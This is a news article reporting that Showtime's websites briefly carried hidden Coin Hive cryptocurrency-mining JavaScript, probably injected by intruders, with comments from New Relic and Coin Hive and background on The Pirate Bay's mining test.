CBS's Showtime caught mining crypto-coins in viewers' web browsers

The websites of US telly giant CBS's Showtime contained JavaScript that secretly commandeered viewers' web browsers over the weekend to mine cryptocurrency.

The flagship Showtime.com and its instant-access ShowtimeAnytime.com sibling silently pulled in code that caused browsers to blow spare processor time calculating new Monero coins – a privacy-focused alternative to the ever-popular Bitcoin. The hidden software typically consumed as much as 60 per cent of CPU capacity on computers visiting the sites.

The scripts were written by Code Hive, a legit outfit that provides JavaScript to website owners: webmasters add the code to their pages so that they can earn slivers of cash from each visitor as an alternative to serving adverts to generate revenue. Over time, money mined by the Code-Hive-hosted scripts adds up and is transferred from Coin Hive to the site's administrators. One Monero coin, 1 XMR, is worth about $92 right now.

However, it's extremely unlikely that a large corporation like CBS would smuggle such a piece of mining code onto its dot-coms – especially since it charges subscribers to watch the hit TV shows online – suggesting someone hacked the websites' source code to insert the mining JavaScript and make a quick buck.

The JavaScript, which appeared on the sites at the start of the weekend and vanished by Monday, sits between HTML comment tags that appear to be an insert from web analytics biz New Relic. Again, it is unlikely that an analytics company would deliberately stash coin-mining scripts onto its customers' pages, so the code must have come from another source – or was injected by miscreants who had compromised Showtime's systems.

Here's a screenshot of the code on showtime.com, seen by El Reg before it was removed. The mining script was loaded early on the page, we note.

And on Showtime Anytime:

We contacted both Showtime and New Relic today asking for more details. Showtime refused to comment. New Relic told us it had nothing to do with the mystery code.

"We take the security of our browser agent extremely seriously and have multiple controls in place to detect malicious or unauthorized modification of its script at various points along its development and deployment pipeline," New Relic's Andrew Schmitt told us.

"Upon reviewing our products and code, the HTML comments shown in the screenshot that are referencing newrelic were not injected by New Relic's agents. It appears they were added to the website by its developers."

We also asked Code Hive for details on the user account the injected code was mining for. "We can't give out any specific information about the account owner as per our privacy terms," the outfit informed us. "We don't know much about these keys or the user they belong to anyway."

The outfit did confirm to us, however, that the email address used to set up the account was a personal one, and was not an official CBS email address, further suggesting malicious activity.

Pirate Bay

Coin Hive's mining code was at the center of some attention last week when file-sharing search engine The Pirate Bay admitted it had added the coin-gathering JavaScript on its pages in order to test its profitability in an effort to get rid of ads on its site.

The code was poorly configured – web admins are allowed to set the hashing rate – and resulted in people's machines slowing to a crawl, sparking complaints. Following the outcry, The Pirate Bay acknowledged the presence of the mining script, calling it "only a test" and promised to limit the CPU usage to make it less annoying. A few days later, the organization dropped the idea all together.

Code Hive not only offers in-page mining but also mining through URL shorteners and CAPTCHAs. The huge advantage to the website operator using the code is that not only does the script use someone else's processing power but also their electricity, meaning that you can make money with very little effort. So long as you are willing to annoy your visitors.

Coin Hive's pitch is that this script could allowed publishers to pull annoying ads from their website – which is something that could become more important as browsers increasingly block ads.

However, the code has already been inserted in browser extensions and on typosquatted websites. And now, it looks as though someone may have tried to hack Showtime's website in order to insert the code and make money while not having any direct impact on the website itself.

If Coin Hive wants to be seen as legitimate rather than a tool for hackers and malware authors, it is going to have to rapidly figure out a better authorization system for big websites and work on making itself less attractive to scammers. Meanwhile, ad blocking tools are now killing the JavaScript on sight. ®

Hat tip to Troy Mursch for alerting us to this mystery.